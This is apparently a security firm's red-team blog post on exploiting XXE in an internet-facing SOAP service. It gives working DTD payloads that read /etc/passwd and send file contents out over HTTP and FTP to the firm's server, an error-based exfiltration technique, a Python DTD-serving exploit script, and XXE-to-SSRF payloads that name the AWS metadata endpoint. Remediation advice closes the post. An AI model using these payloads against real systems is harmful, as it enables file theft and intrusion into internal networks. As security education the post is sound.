TL; DR

Optistream conducted a redteam engagement and discovered a SOAP web service that was vulnerable to XXE[1] attacks
Classical exploitation techniques didn’t work fully as expected, then deeper tests revealed an error-based XXE leveraging the application XML parser
This exploitation technique allowed Optistream to browse and exfiltrate sensitive data stored on the client server from the Internet
Optistream provides hints to avoid such vulnerabilities

Summary

XXE (XML External Entity) represents a significant security vulnerability stemming from improper handling of external entities within XML documents by an XML parser. This flaw arises when an attacker manipulates XML messages sent to an application, such as a web service, where the parser accepts user-defined entities within these messages. XXE could allow attackers to read local files, perform denial-of-service attacks, or execute remote commands by exploiting crafted malicious entities.

In this blog, we delve into a real-world scenario encountered during a red team engagement for one of our clients. We provide a detailed account of how we exploited an XXE vulnerability present in a SOAP web service exposed on the Internet. Despite encountering challenges, our persistence paid off as we successfully leveraged the vulnerability to navigate through and extract sensitive client documents from the Internet.

Finding XXE

Web service discovering

All started with a classical web fuzzing approach on an exposed Linux web server during which we discovered an interesting endpoint located at https://target.com/redacted/wsdl.

WSDL[2] (Web Service Description Language) is a specialized document outlining the public interface and exchange format of web services based on the message-oriented SOAP[3] (Simple Object Access Protocol) protocol. It encompasses crucial details such as the endpoint where the web service is listening (https://target.com/redacted/soapsrv), descriptions of different messages (services reachable by the client), as well as specifications regarding response structures, parameters, and their respective types.

Such description file is easily parsed with tool like SoapUI:

WSDL exploration using SoapUI

SOAP, an XML-based technology, facilitates message exchange between a client and an application providing web services. For an attacker, a critical focus lies in how the application's parser processes incoming XML documents via its web service. Different programming languages and frameworks utilize various XML processing libraries such as Java SAX, PHP libxml, or .NET XmlDocument class. Notably, certain libraries, particularly older versions, may come with default configurations that lack robust security measures, granting users the freedom to manipulate XML formats and their advanced functionalities.

Next part dives into these XML special features.

XML 101

XML[4] (Extensible Markup Language) serves as a means to organize, store, and transport data in a format that's understandable both to humans and machines. It is widely used for exchanging information between different systems, especially on the web, due to its flexibility and ability to describe data hierarchically.

Within a DTD[5] (Document Type Definition), the structure of an XML document can be precisely defined. This includes defining the various elements permissible within the document and their respective construction rules.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE address [
<!ELEMENT person (name,surname,phone)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT surname (#PCDATA)>
<!ELEMENT phone (#PCDATA)>
]>
<address>
<name>John</name>
<surname>Doe</surname>
<phone>+33684339921</phone>
</address>

DTD example

XML also defines the use of entities, which are elements that are also defined within the DTD (definition). Entities act as aliases to other data (raw strings, XML elements…) and can be used as shortcuts for text replacement within the document. For instance, such entities are already defined in XHTML 1.0 DTD: & (replaced with '&'), < ('<'), etc.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY data "SOME_RANDOM_STRING">
]>
<root>
<element>&data;</element>
</root>

Example of string replacement

The danger resides in another kind of entities called External Entities. That are entities referencing data content read from external files (using local file system or URI). If DTD definition can be controlled by an attacker and is processed by the target application, it may be possible to read content of sensitive files or even browse server file system.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY data SYSTEM "file:///etc/passwd">
]>
<root>
<element>&data;</element>
</root>

External entity usage

Using this payload, one can expect to receive a response back from server with an error message embedding content of /etc/passwd. However, it's crucial to note that such behavior is contingent upon the specific implementation of the web service.

Confirming pre-auth XXE

We were able to transmit XML messages via the SOAP protocol to the web service, allowing us to explore the elements we can manipulate within these messages.

We first had to check if we can define a DTD that will be parsed by the application. By testing with a minimalist DTD defining an entity, we confirmed that it was indeed the case.

Then we tested again with external entities:

Figure 1

Figure 2

External entities seem to be parsed by the application: in the case where entity bar is not defined (figure 1), the parser throws an exception while this is not the case when bar is properly defined (figure 2): we are now asked to be authenticated.

In our case, the trivial exploitation technique seen above which consists of referencing a local file via an external entity did not work. The target service didn't return a valuable response, perhaps because the required authentication (see user and password parameters in previous screenshots) aborted the server-side processing prematurely. Note that despite this required authentication, our XML message is still parsed.

Out-of-band XXE

We need another method to read and exfiltrate data from server.

Another popular exploitation technique is called out-of-band (OOB), in which the attacker uses a method to get data out of the target network indirectly. Instead of exfiltrating the data directly using an HTTP response, the data is sent to a server controlled by the attacker through an alternative channel. This involves usage of XML "parameter entities" to leak contents of files leveraging an external protocol (HTTP, FTP, DNS...) supported by the application underlying XML library.

Leaking using HTTP

Parameter entities (PEs) serve the same purpose as other entities (i.e. shortcuts), but they are meant to be used exclusively within DTDs. PEs can be either internal or external and they cannot refer to non-XML data[6].

The technique consists of using a first PE (eval) which will be used to dynamically define a second PE (leak), tasked with executing an HTTP request. This will be crafted in such a way that it includes the contents of the file (data PE) that we wish to leak.

Typical DTD example for this exploitation looks like:

<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % leak SYSTEM 'http://srv.optistream.io:443/?x=%data;'>">
%eval;
%leak;

my.dtd

First, data PE (embedding /etc/hostname content) is replaced within eval PE definition
Then, eval PE is evaluated and define another PE called leak whose task is to load an external DTD (from the attacker server)
Finally, freshly defined leak is evaluated and triggers an HTTP request to our server that looks like http://srv.optistream.io:443/?x=<ETC_HOSTNAME_CONTENT>

W3C standard implies a limitation for PEs usage: they cannot be used « within markup declarations » except in case of external subset[7].

In order to craft our HTTP request by using PEs, this last statement implies we need to host our malicious my.dtd file on an external location (i.e. attacker’s server) to make it an external subset.

Last step is launching the attack by referencing and evaluating our DTD within SOAP XML message header.

We sent the following request to the web service:

<?xml version="1.0" encoding="ISO-8859-1" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://srv.optistream.io/my.dtd">
%dtd;
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hom="REDACTED">
<soapenv:Header/>
<soapenv:Body>
</soapenv:Body>
</soapenv:Envelope>

XXE trigger

The crafted request leaking /etc/hostname is successfully received by our listener:

GET request leaking file content ('x' variable)

This exploitation is adherent to the HTTP protocol. Difficulties arise when we try to exfiltrate multiline (e.g. /etc/passwd) or non-ASCII files because it leads to non-compliant HTTP requests thus only small part of files can be leaked.

Attempt 2

We then tried to exploit OOB XXE using FTP protocol. The principle is the same as with HTTP but instead we use the FTP protocol scheme inside DTD:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % leak SYSTEM 'ftp://srv.optistream.io/%data;'>">
%eval;
%leak;

For exfiltrated data gathering, we made usage of a handmade FTP server accepting client connection and recording sent commands and data. We gave a try to xxeserv[8]:

$ ./xxeftp -p 21
[*] UNO Listening...
2024/04/12 07:30:55 [*] GO XXE FTP Server - Port: 21
2024/04/12 07:31:04 [*] Connection Accepted from [REDACTED:51620]
USER: anonymous
PASS: Java10.0.2@
/root:x:0:0::
/root:
/bin
2024/04/12 07:31:04 [*] Closing FTP Connection

Corresponding network capture:

220 Staal XXE-FTP
USER anonymous
331 password please - version check
PASS Java10.0.2@
230 User logged in
TYPE I
230 more data please!
CWD root:x:0:0::
250 Directory successfully changed.
CWD root:
250 Directory successfully changed.
CWD bin
250 Directory successfully changed.
QUIT
221 Goodbye.

We first guessed usage of Java 10 by the application (deprecated since 2018). We then observed sending of successive CWD commands each time Java client encounters a '/' character from exfiltrated data. At the end, a final QUIT is sent by the client that prematurely terminates data exchange.

By consequences, only part of /etc/passwd is leaked and retrieval is still partial. This behavior is due to Java version, versions until Java 7 successfully exfiltrate multiline content but superior versions don’t support such URIs.

Error-based XXE

Make it verbose

We’ve previously shown that OOB XXE exploitation was not completely satisfying for us. We also observed that authentication asked by the web service could be the reason why trivial exploitation discussed in first part didn’t work neither.

Another technique we didn’t have explored yet is making the parser crash so that it shows us an error before authentication is asked by the web service.

We finally discovered a way to do it by triggering an error during XML parsing: based on our previous malicious DTD, we made it happen by crafting an URI using an unknown protocol scheme when retrieving external entities. Indeed, some standard protocol schemes (e.g. HTTP, FTP, Gopher…) are offered by the underlying XML parser, we tested to inject the following DTD containing an unknown scheme:

<!ENTITY % eval "<!ENTITY % leak SYSTEM 'foo:///'>">
%eval;
%leak;

This was sufficient to trigger an exception by the server and most interesting of all, it reflected the "foo" string within the error message:

…
<faultstring>
[REDACTED] exception: java.net.MalformedURLException:no protocol: foo:///
</faultstring>
…

Within my.dtd, we tried to replace "foo" with dynamic content using external PE as in previously attempts:

<!ENTITY % data SYSTEM "file:///etc/hosts">
<!ENTITY % eval "<!ENTITY % leak SYSTEM '%data;:///'>">
%eval;
%leak;

Still using the same XXE trigger, this time it was a success:

Parser error leaking file content

This time, full content of multiline file was leaked, it even worked for bigger files.

This exploitation was powerful, we could also browse target file system by specifying directories instead of files within data PE (e.g. file:/// to get listing of root directory).

Scripting

We have written a script to ease exploitation:

#!/usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
‍
XXE_FMT = """
<!ENTITY % data SYSTEM "file://{}">
<!ENTITY % eval "<!ENTITY % leak SYSTEM '%data;:///'>">
%eval;
%leak;
"""
‍
class XXEServer(BaseHTTPRequestHandler):
def _set_response(self, response_len):
self.send_response(200)
self.send_header('Content-type', 'application/octet-stream')
self.send_header('Content-length', str(response_len))
self.end_headers()
‍
def do_GET(self):
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
response = XXE_FMT.format(self.path).encode('utf-8')
self._set_response(len(response))
self.wfile.write(response)
‍
def run(server_class=HTTPServer, handler_class=XXEServer, port=8080):
logging.basicConfig(level=logging.INFO)
server_address = ('', port)
httpd = server_class(server_address, handler_class)
logging.info('Starting httpd...\n')
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
logging.info('Stopping httpd...\n')
‍
if __name__ == '__main__':
from sys import argv
‍
if len(argv) == 2:
run(port=int(argv[1]))
else:
run()

Exploitation script

This tool serves a dynamically generated DTD based on HTTP URL path sent to our controlled server that matches with file or directory we want respectively read or browse on target server.

Here, the XXE trigger is different, we need to specify target file path within URL of our malicious DTD hosted on our server:

<?xml version="1.0" encoding="ASCII" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://srv.optistream.io/etc/passwd">
%dtd;
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hom="REDACTED">
<soapenv:Header/>
<soapenv:Body>
</soapenv:Body>
</soapenv:Envelope>

… and we get back full file content (in a more flexible way)!

From XXE to SSRF

This XXE can easily be upgraded to an SSRF (Server-Side Request Forgery) attack.

SSRF attack allows an attacker to manipulate a vulnerable server to send HTTP requests to another internal (or external) server, often to access sensitive information or perform unauthorized actions. The attacker exploits this vulnerability by injecting malicious URLs into requests that the vulnerable server will then execute.

We simply adapted our my.dtd to make data PE point to an arbitrary URL:

<!ENTITY % data SYSTEM "https://internal.target.local">
<!ENTITY % eval "<!ENTITY % leak SYSTEM '%data;:///'>">
%eval;
%leak;

Then HTML source code of the target page got displayed:

Using XXE for SSRF attack

This would be particularly powerful within cloud environments. For instance, AWS environment exposes an internal endpoint (http://169.254.169.254/latest/meta-data)[9] that gives access to instance metadata and leaks sensitive information such as credentials[10].

Our pentest engagement did not take place in a cloud environment, however, usage of XXE-SSRF allowed us to scan the client private network and obtain some interesting insights into running internal services.

Remediations

This vulnerability could have been avoided by implementing 3 different measures:

Disabling of XML external entities: this fix depends on language and underlying XML library your application uses. OWASP[11] and SonarSource[12] are good references that can guide you. For example, JDK >= 6 provides special flag javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING to enable secure processing of XML that you can enable on factories through setFeature method call
Setting up authentication in front of application access: don’t let attacker any chance to interact with your application if an authentication is required (i.e. reduce attack surface), avoid implementing authentication by yourself and prefer relying on native mechanisms (JWT, SSO, WWW-Authenticate…)
Don’t give error or debug information to end users: error messages are prone to leak sensitive information (stack traces, authorization tokens…), we saw that in our case it allowed us to retrieve server file contents. For debugging purposes, prefer using local logging system and make sure to disable any error output[13] from your Web application

Links

[1] https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
[2] https://www.w3.org/TR/2001/NOTE-wsdl-20010315
[3] https://www.w3.org/TR/2000/NOTE-SOAP-20000508/
[4] https://www.w3.org/TR/xml/
[5] https://www.w3.org/TR/xml/#dt-doctype
[6] https://www.xml.com/pub/a/98/08/xmlqna2.html
[7] https://www.w3.org/TR/xml/#wfc-PEinInternalSubset
[8] https://github.com/staaldraad/xxeserv
[9] https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
[10] https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html
[11] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[12] https://www.sonarsource.com/blog/secure-xml-processor/
[13] https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html

RedTeam tales 0x1: Soapy xxe

TL; DR

TL; DR

Summary

Finding XXE

Web service discovering

XML 101

Confirming pre-auth XXE

Out-of-band XXE

Leaking using HTTP

Attempt 2

Error-based XXE

Make it verbose

Scripting

From XXE to SSRF

Remediations

Links